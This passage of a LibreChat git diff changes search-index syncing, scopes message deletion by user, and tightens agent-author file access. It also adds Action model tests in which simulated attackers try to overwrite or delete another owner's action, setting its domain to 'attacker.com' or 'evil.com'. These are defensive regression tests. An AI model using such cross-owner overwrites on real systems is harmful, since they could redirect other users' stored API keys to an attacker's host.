Time.TEN_MINUTES,
|
||||||
|
|
|
||||||
|
|
@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) {
|
||||||
const messageCount = messageProgress.totalDocuments;
|
const messageCount = messageProgress.totalDocuments;
|
||||||
const messagesIndexed = messageProgress.totalProcessed;
|
const messagesIndexed = messageProgress.totalProcessed;
|
||||||
const unindexedMessages = messageCount - messagesIndexed;
|
const unindexedMessages = messageCount - messagesIndexed;
|
||||||
|
const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0;
|
||||||
|
|
||||||
if (settingsUpdated || unindexedMessages > syncThreshold) {
|
if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) {
|
||||||
|
if (noneIndexed && !settingsUpdated) {
|
||||||
|
logger.info('[indexSync] No messages marked as indexed, forcing full sync');
|
||||||
|
}
|
||||||
logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`);
|
logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`);
|
||||||
await Message.syncWithMeili();
|
await Message.syncWithMeili();
|
||||||
messagesSync = true;
|
messagesSync = true;
|
||||||
|
|
@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) {
|
||||||
|
|
||||||
const convoCount = convoProgress.totalDocuments;
|
const convoCount = convoProgress.totalDocuments;
|
||||||
const convosIndexed = convoProgress.totalProcessed;
|
const convosIndexed = convoProgress.totalProcessed;
|
||||||
|
|
||||||
const unindexedConvos = convoCount - convosIndexed;
|
const unindexedConvos = convoCount - convosIndexed;
|
||||||
if (settingsUpdated || unindexedConvos > syncThreshold) {
|
const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0;
|
||||||
|
|
||||||
|
if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) {
|
||||||
|
if (noneConvosIndexed && !settingsUpdated) {
|
||||||
|
logger.info('[indexSync] No conversations marked as indexed, forcing full sync');
|
||||||
|
}
|
||||||
logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`);
|
logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`);
|
||||||
await Conversation.syncWithMeili();
|
await Conversation.syncWithMeili();
|
||||||
convosSync = true;
|
convosSync = true;
|
||||||
|
|
|
||||||
|
|
@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => {
|
||||||
);
|
);
|
||||||
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)');
|
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)');
|
||||||
});
|
});
|
||||||
|
|
||||||
|
test('forces sync when zero documents indexed (reset scenario) even if below threshold', async () => {
|
||||||
|
Message.getSyncProgress.mockResolvedValue({
|
||||||
|
totalProcessed: 0,
|
||||||
|
totalDocuments: 680,
|
||||||
|
isComplete: false,
|
||||||
|
});
|
||||||
|
|
||||||
|
Conversation.getSyncProgress.mockResolvedValue({
|
||||||
|
totalProcessed: 0,
|
||||||
|
totalDocuments: 76,
|
||||||
|
isComplete: false,
|
||||||
|
});
|
||||||
|
|
||||||
|
Message.syncWithMeili.mockResolvedValue(undefined);
|
||||||
|
Conversation.syncWithMeili.mockResolvedValue(undefined);
|
||||||
|
|
||||||
|
const indexSync = require('./indexSync');
|
||||||
|
await indexSync();
|
||||||
|
|
||||||
|
expect(Message.syncWithMeili).toHaveBeenCalledTimes(1);
|
||||||
|
expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1);
|
||||||
|
expect(mockLogger.info).toHaveBeenCalledWith(
|
||||||
|
'[indexSync] No messages marked as indexed, forcing full sync',
|
||||||
|
);
|
||||||
|
expect(mockLogger.info).toHaveBeenCalledWith(
|
||||||
|
'[indexSync] Starting message sync (680 unindexed)',
|
||||||
|
);
|
||||||
|
expect(mockLogger.info).toHaveBeenCalledWith(
|
||||||
|
'[indexSync] No conversations marked as indexed, forcing full sync',
|
||||||
|
);
|
||||||
|
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('does NOT force sync when some documents already indexed and below threshold', async () => {
|
||||||
|
Message.getSyncProgress.mockResolvedValue({
|
||||||
|
totalProcessed: 630,
|
||||||
|
totalDocuments: 680,
|
||||||
|
isComplete: false,
|
||||||
|
});
|
||||||
|
|
||||||
|
Conversation.getSyncProgress.mockResolvedValue({
|
||||||
|
totalProcessed: 70,
|
||||||
|
totalDocuments: 76,
|
||||||
|
isComplete: false,
|
||||||
|
});
|
||||||
|
|
||||||
|
const indexSync = require('./indexSync');
|
||||||
|
await indexSync();
|
||||||
|
|
||||||
|
expect(Message.syncWithMeili).not.toHaveBeenCalled();
|
||||||
|
expect(Conversation.syncWithMeili).not.toHaveBeenCalled();
|
||||||
|
expect(mockLogger.info).not.toHaveBeenCalledWith(
|
||||||
|
'[indexSync] No messages marked as indexed, forcing full sync',
|
||||||
|
);
|
||||||
|
expect(mockLogger.info).not.toHaveBeenCalledWith(
|
||||||
|
'[indexSync] No conversations marked as indexed, forcing full sync',
|
||||||
|
);
|
||||||
|
expect(mockLogger.info).toHaveBeenCalledWith(
|
||||||
|
'[indexSync] 50 messages unindexed (below threshold: 1000, skipping)',
|
||||||
|
);
|
||||||
|
expect(mockLogger.info).toHaveBeenCalledWith(
|
||||||
|
'[indexSync] 6 convos unindexed (below threshold: 1000, skipping)',
|
||||||
|
);
|
||||||
|
});
|
||||||
});
|
});
|
||||||
|
|
|
||||||
|
|
@ -3,12 +3,13 @@ module.exports = {
|
||||||
clearMocks: true,
|
clearMocks: true,
|
||||||
roots: ['<rootDir>'],
|
roots: ['<rootDir>'],
|
||||||
coverageDirectory: 'coverage',
|
coverageDirectory: 'coverage',
|
||||||
|
maxWorkers: '50%',
|
||||||
testTimeout: 30000, // 30 seconds timeout for all tests
|
testTimeout: 30000, // 30 seconds timeout for all tests
|
||||||
setupFiles: ['./test/jestSetup.js', './test/__mocks__/logger.js'],
|
setupFiles: ['./test/jestSetup.js', './test/__mocks__/logger.js'],
|
||||||
moduleNameMapper: {
|
moduleNameMapper: {
|
||||||
'~/(.*)': '<rootDir>/$1',
|
'~/(.*)': '<rootDir>/$1',
|
||||||
'~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json',
|
'~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json',
|
||||||
'^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part
|
'^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js',
|
||||||
'^openid-client$': '<rootDir>/test/__mocks__/openid-client.js',
|
'^openid-client$': '<rootDir>/test/__mocks__/openid-client.js',
|
||||||
},
|
},
|
||||||
transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'],
|
transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'],
|
||||||
|
|
|
||||||
|
|
@ -4,9 +4,7 @@ const { Action } = require('~/db/models');
|
||||||
* Update an action with new data without overwriting existing properties,
|
* Update an action with new data without overwriting existing properties,
|
||||||
* or create a new action if it doesn't exist.
|
* or create a new action if it doesn't exist.
|
||||||
*
|
*
|
||||||
* @param {Object} searchParams - The search parameters to find the action to update.
|
* @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams
|
||||||
* @param {string} searchParams.action_id - The ID of the action to update.
|
|
||||||
* @param {string} searchParams.user - The user ID of the action's author.
|
|
||||||
* @param {Object} updateData - An object containing the properties to update.
|
* @param {Object} updateData - An object containing the properties to update.
|
||||||
* @returns {Promise<Action>} The updated or newly created action document as a plain object.
|
* @returns {Promise<Action>} The updated or newly created action document as a plain object.
|
||||||
*/
|
*/
|
||||||
|
|
@ -47,10 +45,8 @@ const getActions = async (searchParams, includeSensitive = false) => {
|
||||||
/**
|
/**
|
||||||
* Deletes an action by params.
|
* Deletes an action by params.
|
||||||
*
|
*
|
||||||
* @param {Object} searchParams - The search parameters to find the action to delete.
|
* @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams
|
||||||
* @param {string} searchParams.action_id - The ID of the action to delete.
|
* @returns {Promise<Action|null>} The deleted action document as a plain object, or null if no match.
|
||||||
* @param {string} searchParams.user - The user ID of the action's author.
|
|
||||||
* @returns {Promise<Action>} A promise that resolves to the deleted action document as a plain object, or null if no document was found.
|
|
||||||
*/
|
*/
|
||||||
const deleteAction = async (searchParams) => {
|
const deleteAction = async (searchParams) => {
|
||||||
return await Action.findOneAndDelete(searchParams).lean();
|
return await Action.findOneAndDelete(searchParams).lean();
|
||||||
|
|
|
||||||
250
api/models/Action.spec.js
Normal file
250
api/models/Action.spec.js
Normal file
|
|
@ -0,0 +1,250 @@
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
const { actionSchema } = require('@librechat/data-schemas');
|
||||||
|
const { updateAction, getActions, deleteAction } = require('./Action');
|
||||||
|
|
||||||
|
let mongoServer;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
const mongoUri = mongoServer.getUri();
|
||||||
|
if (!mongoose.models.Action) {
|
||||||
|
mongoose.model('Action', actionSchema);
|
||||||
|
}
|
||||||
|
await mongoose.connect(mongoUri);
|
||||||
|
}, 20000);
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await mongoose.models.Action.deleteMany({});
|
||||||
|
});
|
||||||
|
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
|
||||||
|
describe('Action ownership scoping', () => {
|
||||||
|
describe('updateAction', () => {
|
||||||
|
it('updates when action_id and agent_id both match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_1',
|
||||||
|
agent_id: 'agent_A',
|
||||||
|
metadata: { domain: 'example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await updateAction(
|
||||||
|
{ action_id: 'act_1', agent_id: 'agent_A' },
|
||||||
|
{ metadata: { domain: 'updated.com' } },
|
||||||
|
);
|
||||||
|
|
||||||
|
expect(result).not.toBeNull();
|
||||||
|
expect(result.metadata.domain).toBe('updated.com');
|
||||||
|
expect(result.agent_id).toBe('agent_A');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('does not update when agent_id does not match (creates a new doc via upsert)', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_1',
|
||||||
|
agent_id: 'agent_B',
|
||||||
|
metadata: { domain: 'victim.com', api_key: 'secret' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await updateAction(
|
||||||
|
{ action_id: 'act_1', agent_id: 'agent_A' },
|
||||||
|
{ user: userId, metadata: { domain: 'attacker.com' } },
|
||||||
|
);
|
||||||
|
|
||||||
|
expect(result.metadata.domain).toBe('attacker.com');
|
||||||
|
|
||||||
|
const original = await mongoose.models.Action.findOne({
|
||||||
|
action_id: 'act_1',
|
||||||
|
agent_id: 'agent_B',
|
||||||
|
}).lean();
|
||||||
|
expect(original).not.toBeNull();
|
||||||
|
expect(original.metadata.domain).toBe('victim.com');
|
||||||
|
expect(original.metadata.api_key).toBe('secret');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('updates when action_id and assistant_id both match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_2',
|
||||||
|
assistant_id: 'asst_X',
|
||||||
|
metadata: { domain: 'example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await updateAction(
|
||||||
|
{ action_id: 'act_2', assistant_id: 'asst_X' },
|
||||||
|
{ metadata: { domain: 'updated.com' } },
|
||||||
|
);
|
||||||
|
|
||||||
|
expect(result).not.toBeNull();
|
||||||
|
expect(result.metadata.domain).toBe('updated.com');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('does not overwrite when assistant_id does not match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_2',
|
||||||
|
assistant_id: 'asst_victim',
|
||||||
|
metadata: { domain: 'victim.com', api_key: 'secret' },
|
||||||
|
});
|
||||||
|
|
||||||
|
await updateAction(
|
||||||
|
{ action_id: 'act_2', assistant_id: 'asst_attacker' },
|
||||||
|
{ user: userId, metadata: { domain: 'attacker.com' } },
|
||||||
|
);
|
||||||
|
|
||||||
|
const original = await mongoose.models.Action.findOne({
|
||||||
|
action_id: 'act_2',
|
||||||
|
assistant_id: 'asst_victim',
|
||||||
|
}).lean();
|
||||||
|
expect(original).not.toBeNull();
|
||||||
|
expect(original.metadata.domain).toBe('victim.com');
|
||||||
|
expect(original.metadata.api_key).toBe('secret');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('deleteAction', () => {
|
||||||
|
it('deletes when action_id and agent_id both match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_del',
|
||||||
|
agent_id: 'agent_A',
|
||||||
|
metadata: { domain: 'example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' });
|
||||||
|
expect(result).not.toBeNull();
|
||||||
|
expect(result.action_id).toBe('act_del');
|
||||||
|
|
||||||
|
const remaining = await mongoose.models.Action.countDocuments();
|
||||||
|
expect(remaining).toBe(0);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns null and preserves the document when agent_id does not match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_del',
|
||||||
|
agent_id: 'agent_B',
|
||||||
|
metadata: { domain: 'victim.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' });
|
||||||
|
expect(result).toBeNull();
|
||||||
|
|
||||||
|
const remaining = await mongoose.models.Action.countDocuments();
|
||||||
|
expect(remaining).toBe(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('deletes when action_id and assistant_id both match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_del_asst',
|
||||||
|
assistant_id: 'asst_X',
|
||||||
|
metadata: { domain: 'example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await deleteAction({ action_id: 'act_del_asst', assistant_id: 'asst_X' });
|
||||||
|
expect(result).not.toBeNull();
|
||||||
|
|
||||||
|
const remaining = await mongoose.models.Action.countDocuments();
|
||||||
|
expect(remaining).toBe(0);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns null and preserves the document when assistant_id does not match', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_del_asst',
|
||||||
|
assistant_id: 'asst_victim',
|
||||||
|
metadata: { domain: 'victim.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await deleteAction({
|
||||||
|
action_id: 'act_del_asst',
|
||||||
|
assistant_id: 'asst_attacker',
|
||||||
|
});
|
||||||
|
expect(result).toBeNull();
|
||||||
|
|
||||||
|
const remaining = await mongoose.models.Action.countDocuments();
|
||||||
|
expect(remaining).toBe(1);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('getActions (unscoped baseline)', () => {
|
||||||
|
it('returns actions by action_id regardless of agent_id', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_shared',
|
||||||
|
agent_id: 'agent_B',
|
||||||
|
metadata: { domain: 'example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const results = await getActions({ action_id: 'act_shared' }, true);
|
||||||
|
expect(results).toHaveLength(1);
|
||||||
|
expect(results[0].agent_id).toBe('agent_B');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns actions scoped by agent_id when provided', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_scoped',
|
||||||
|
agent_id: 'agent_A',
|
||||||
|
metadata: { domain: 'a.com' },
|
||||||
|
});
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_other',
|
||||||
|
agent_id: 'agent_B',
|
||||||
|
metadata: { domain: 'b.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const results = await getActions({ agent_id: 'agent_A' });
|
||||||
|
expect(results).toHaveLength(1);
|
||||||
|
expect(results[0].action_id).toBe('act_scoped');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('cross-type protection', () => {
|
||||||
|
it('updateAction with agent_id filter does not overwrite assistant-owned action', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_cross',
|
||||||
|
assistant_id: 'asst_victim',
|
||||||
|
metadata: { domain: 'victim.com', api_key: 'secret' },
|
||||||
|
});
|
||||||
|
|
||||||
|
await updateAction(
|
||||||
|
{ action_id: 'act_cross', agent_id: 'agent_attacker' },
|
||||||
|
{ user: userId, metadata: { domain: 'evil.com' } },
|
||||||
|
);
|
||||||
|
|
||||||
|
const original = await mongoose.models.Action.findOne({
|
||||||
|
action_id: 'act_cross',
|
||||||
|
assistant_id: 'asst_victim',
|
||||||
|
}).lean();
|
||||||
|
expect(original).not.toBeNull();
|
||||||
|
expect(original.metadata.domain).toBe('victim.com');
|
||||||
|
expect(original.metadata.api_key).toBe('secret');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('deleteAction with agent_id filter does not delete assistant-owned action', async () => {
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_cross_del',
|
||||||
|
assistant_id: 'asst_victim',
|
||||||
|
metadata: { domain: 'victim.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await deleteAction({ action_id: 'act_cross_del', agent_id: 'agent_attacker' });
|
||||||
|
expect(result).toBeNull();
|
||||||
|
|
||||||
|
const remaining = await mongoose.models.Action.countDocuments();
|
||||||
|
expect(remaining).toBe(1);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -228,7 +228,7 @@ module.exports = {
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
};
|
};
|
||||||
} catch (err) {
|
} catch (_err) {
|
||||||
logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning');
|
logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning');
|
||||||
}
|
}
|
||||||
if (cursorFilter) {
|
if (cursorFilter) {
|
||||||
|
|
@ -361,6 +361,7 @@ module.exports = {
|
||||||
|
|
||||||
const deleteMessagesResult = await deleteMessages({
|
const deleteMessagesResult = await deleteMessages({
|
||||||
conversationId: { $in: conversationIds },
|
conversationId: { $in: conversationIds },
|
||||||
|
user,
|
||||||
});
|
});
|
||||||
|
|
||||||
return { ...deleteConvoResult, messages: deleteMessagesResult };
|
return { ...deleteConvoResult, messages: deleteMessagesResult };
|
||||||
|
|
|
||||||
|
|
@ -549,6 +549,7 @@ describe('Conversation Operations', () => {
|
||||||
expect(result.messages.deletedCount).toBe(5);
|
expect(result.messages.deletedCount).toBe(5);
|
||||||
expect(deleteMessages).toHaveBeenCalledWith({
|
expect(deleteMessages).toHaveBeenCalledWith({
|
||||||
conversationId: { $in: [mockConversationData.conversationId] },
|
conversationId: { $in: [mockConversationData.conversationId] },
|
||||||
|
user: 'user123',
|
||||||
});
|
});
|
||||||
|
|
||||||
// Verify conversation was deleted
|
// Verify conversation was deleted
|
||||||
|
|
|
||||||
|
|
@ -152,12 +152,11 @@ describe('File Access Control', () => {
|
||||||
expect(accessMap.get(fileIds[3])).toBe(false);
|
expect(accessMap.get(fileIds[3])).toBe(false);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should grant access to all files when user is the agent author', async () => {
|
it('should only grant author access to files attached to the agent', async () => {
|
||||||
const authorId = new mongoose.Types.ObjectId();
|
const authorId = new mongoose.Types.ObjectId();
|
||||||
const agentId = uuidv4();
|
const agentId = uuidv4();
|
||||||
const fileIds = [uuidv4(), uuidv4(), uuidv4()];
|
const fileIds = [uuidv4(), uuidv4(), uuidv4()];
|
||||||
|
|
||||||
// Create author user
|
|
||||||
await User.create({
|
await User.create({
|
||||||
_id: authorId,
|
_id: authorId,
|
||||||
email: 'author@example.com',
|
email: 'author@example.com',
|
||||||
|
|
@ -165,7 +164,6 @@ describe('File Access Control', () => {
|
||||||
provider: 'local',
|
provider: 'local',
|
||||||
});
|
});
|
||||||
|
|
||||||
// Create agent
|
|
||||||
await createAgent({
|
await createAgent({
|
||||||
id: agentId,
|
id: agentId,
|
||||||
name: 'Test Agent',
|
name: 'Test Agent',
|
||||||
|
|
@ -174,12 +172,83 @@ describe('File Access Control', () => {
|
||||||
provider: 'openai',
|
provider: 'openai',
|
||||||
tool_resources: {
|
tool_resources: {
|
||||||
file_search: {
|
file_search: {
|
||||||
file_ids: [fileIds[0]], // Only one file attached
|
file_ids: [fileIds[0]],
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
|
||||||
|
const accessMap = await hasAccessToFilesViaAgent({
|
||||||
|
userId: authorId,
|
||||||
|
role: SystemRoles.USER,
|
||||||
|
fileIds,
|
||||||
|
agentId,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(accessMap.get(fileIds[0])).toBe(true);
|
||||||
|
expect(accessMap.get(fileIds[1])).toBe(false);
|
||||||
|
expect(accessMap.get(fileIds[2])).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should deny all access when agent has no tool_resources', async () => {
|
||||||
|
const authorId = new mongoose.Types.ObjectId();
|
||||||
|
const agentId = uuidv4();
|
||||||
|
const fileId = uuidv4();
|
||||||
|
|
||||||
|
await User.create({
|
||||||
|
_id: authorId,
|
||||||
|
email: 'author-no-resources@example.com',
|
||||||
|
emailVerified: true,
|
||||||
|
provider: 'local',
|
||||||
|
});
|
||||||
|
|
||||||
|
await createAgent({
|
||||||
|
id: agentId,
|
||||||
|
name: 'Bare Agent',
|
||||||
|
author: authorId,
|
||||||
|
model: 'gpt-4',
|
||||||
|
provider: 'openai',
|
||||||
|
});
|
||||||
|
|
||||||
|
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
|
||||||
|
const accessMap = await hasAccessToFilesViaAgent({
|
||||||
|
userId: authorId,
|
||||||
|
role: SystemRoles.USER,
|
||||||
|
fileIds: [fileId],
|
||||||
|
agentId,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(accessMap.get(fileId)).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should grant access to files across multiple resource types', async () => {
|
||||||
|
const authorId = new mongoose.Types.ObjectId();
|
||||||
|
const agentId = uuidv4();
|
||||||
|
const fileIds = [uuidv4(), uuidv4(), uuidv4()];
|
||||||
|
|
||||||
|
await User.create({
|
||||||
|
_id: authorId,
|
||||||
|
email: 'author-multi@example.com',
|
||||||
|
emailVerified: true,
|
||||||
|
provider: 'local',
|
||||||
|
});
|
||||||
|
|
||||||
|
await createAgent({
|
||||||
|
id: agentId,
|
||||||
|
name: 'Multi Resource Agent',
|
||||||
|
author: authorId,
|
||||||
|
model: 'gpt-4',
|
||||||
|
provider: 'openai',
|
||||||
|
tool_resources: {
|
||||||
|
file_search: {
|
||||||
|
file_ids: [fileIds[0]],
|
||||||
|
},
|
||||||
|
execute_code: {
|
||||||
|
file_ids: [fileIds[1]],
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
});
|
});
|
||||||
|
|
||||||
// Check access as the author
|
|
||||||
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
|
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
|
||||||
const accessMap = await hasAccessToFilesViaAgent({
|
const accessMap = await hasAccessToFilesViaAgent({
|
||||||
userId: authorId,
|
userId: authorId,
|
||||||
|
|
@ -188,10 +257,48 @@ describe('File Access Control', () => {
|
||||||
agentId,
|
agentId,
|
||||||
});
|
});
|
||||||
|
|
||||||
// Author should have access to all files
|
|
||||||
expect(accessMap.get(fileIds[0])).toBe(true);
|
expect(accessMap.get(fileIds[0])).toBe(true);
|
||||||
expect(accessMap.get(fileIds[1])).toBe(true);
|
expect(accessMap.get(fileIds[1])).toBe(true);
|
||||||
expect(accessMap.get(fileIds[2])).toBe(true);
|
expect(accessMap.get(fileIds[2])).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should grant author access to attached files when isDelete is true', async () => {
|
||||||
|
const authorId = new mongoose.Types.ObjectId();
|
||||||
|
const agentId = uuidv4();
|
||||||
|
const attachedFileId = uuidv4();
|
||||||
|
const unattachedFileId = uuidv4();
|
||||||
|
|
||||||
|
await User.create({
|
||||||
|
_id: authorId,
|
||||||
|
email: 'author-delete@example.com',
|
||||||
|
emailVerified: true,
|
||||||
|
provider: 'local',
|
||||||
|
});
|
||||||
|
|
||||||
|
await createAgent({
|
||||||
|
id: agentId,
|
||||||
|
name: 'Delete Test Agent',
|
||||||
|
author: authorId,
|
||||||
|
model: 'gpt-4',
|
||||||
|
provider: 'openai',
|
||||||
|
tool_resources: {
|
||||||
|
file_search: {
|
||||||
|
file_ids: [attachedFileId],
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
|
||||||
|
const accessMap = await hasAccessToFilesViaAgent({
|
||||||
|
userId: authorId,
|
||||||
|
role: SystemRoles.USER,
|
||||||
|
fileIds: [attachedFileId, unattachedFileId],
|
||||||
|
agentId,
|
||||||
|
isDelete: true,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(accessMap.get(attachedFileId)).toBe(true);
|
||||||
|
expect(accessMap.get(unattachedFileId)).toBe(false);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should handle non-existent agent gracefully', async () => {
|
it('should handle non-existent agent gracefully', async () => {
|
||||||
|
|
|
||||||
|
|
@ -1,140 +1,7 @@
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger, CANCEL_RATE } = require('@librechat/data-schemas');
|
||||||
const { getMultiplier, getCacheMultiplier } = require('./tx');
|
const { getMultiplier, getCacheMultiplier } = require('./tx');
|
||||||
const { Transaction, Balance } = require('~/db/models');
|
const { Transaction } = require('~/db/models');
|
||||||
|
const { updateBalance } = require('~/models');
|
||||||
const cancelRate = 1.15;
|
|
||||||
|
|
||||||
/**
|
|
||||||
* Updates a user's token balance based on a transaction using optimistic concurrency control
|
|
||||||
* without schema changes. Compatible with DocumentDB.
|
|
||||||
* @async
|
|
||||||
* @function
|
|
||||||
* @param {Object} params - The function parameters.
|
|
||||||
* @param {string|mongoose.Types.ObjectId} params.user - The user ID.
|
|
||||||
* @param {number} params.incrementValue - The value to increment the balance by (can be negative).
|
|
||||||
* @param {import('mongoose').UpdateQuery<import('@librechat/data-schemas').IBalance>['$set']} [params.setValues] - Optional additional fields to set.
|
|
||||||
* @returns {Promise<Object>} Returns the updated balance document (lean).
|
|
||||||
* @throws {Error} Throws an error if the update fails after multiple retries.
|
|
||||||
*/
|
|
||||||
const updateBalance = async ({ user, incrementValue, setValues }) => {
|
|
||||||
let maxRetries = 10; // Number of times to retry on conflict
|
|
||||||
let delay = 50; // Initial retry delay in ms
|
|
||||||
let lastError = null;
|
|
||||||
|
|
||||||
for (let attempt = 1; attempt <= maxRetries; attempt++) {
|
|
||||||
let currentBalanceDoc;
|
|
||||||
try {
|
|
||||||
// 1. Read the current document state
|
|
||||||
currentBalanceDoc = await Balance.findOne({ user }).lean();
|
|
||||||
const currentCredits = currentBalanceDoc ? currentBalanceDoc.tokenCredits : 0;
|
|
||||||
|
|
||||||
// 2. Calculate the desired new state
|
|
||||||
const potentialNewCredits = currentCredits + incrementValue;
|
|
||||||
const newCredits = Math.max(0, potentialNewCredits); // Ensure balance doesn't go below zero
|
|
||||||
|
|
||||||
// 3. Prepare the update payload
|
|
||||||
const updatePayload = {
|
|
||||||
$set: {
|
|
||||||
tokenCredits: newCredits,
|
|
||||||
...(setValues || {}), // Merge other values to set
|
|
||||||
},
|
|
||||||
};
|
|
||||||
|
|
||||||
// 4. Attempt the conditional update or upsert
|
|
||||||
let updatedBalance = null;
|
|
||||||
if (currentBalanceDoc) {
|
|
||||||
// --- Document Exists: Perform Conditional Update ---
|
|
||||||
// Try to update only if the tokenCredits match the value we read (currentCredits)
|
|
||||||
updatedBalance = await Balance.findOneAndUpdate(
|
|
||||||
{
|
|
||||||
user: user,
|
|
||||||
tokenCredits: currentCredits, // Optimistic lock: condition based on the read value
|
|
||||||
},
|
|
||||||
updatePayload,
|
|
||||||
{
|
|
||||||
new: true, // Return the modified document
|
|
||||||
// lean: true, // .lean() is applied after query execution in Mongoose >= 6
|
|
||||||
},
|
|
||||||
).lean(); // Use lean() for plain JS object
|
|
||||||
|
|
||||||
if (updatedBalance) {
|
|
||||||
// Success! The update was applied based on the expected current state.
|
|
||||||
return updatedBalance;
|
|
||||||
}
|
|
||||||
// If updatedBalance is null, it means tokenCredits changed between read and write (conflict).
|
|
||||||
lastError = new Error(`Concurrency conflict for user ${user} on attempt ${attempt}.`);
|
|
||||||
// Proceed to retry logic below.
|
|
||||||
} else {
|
|
||||||
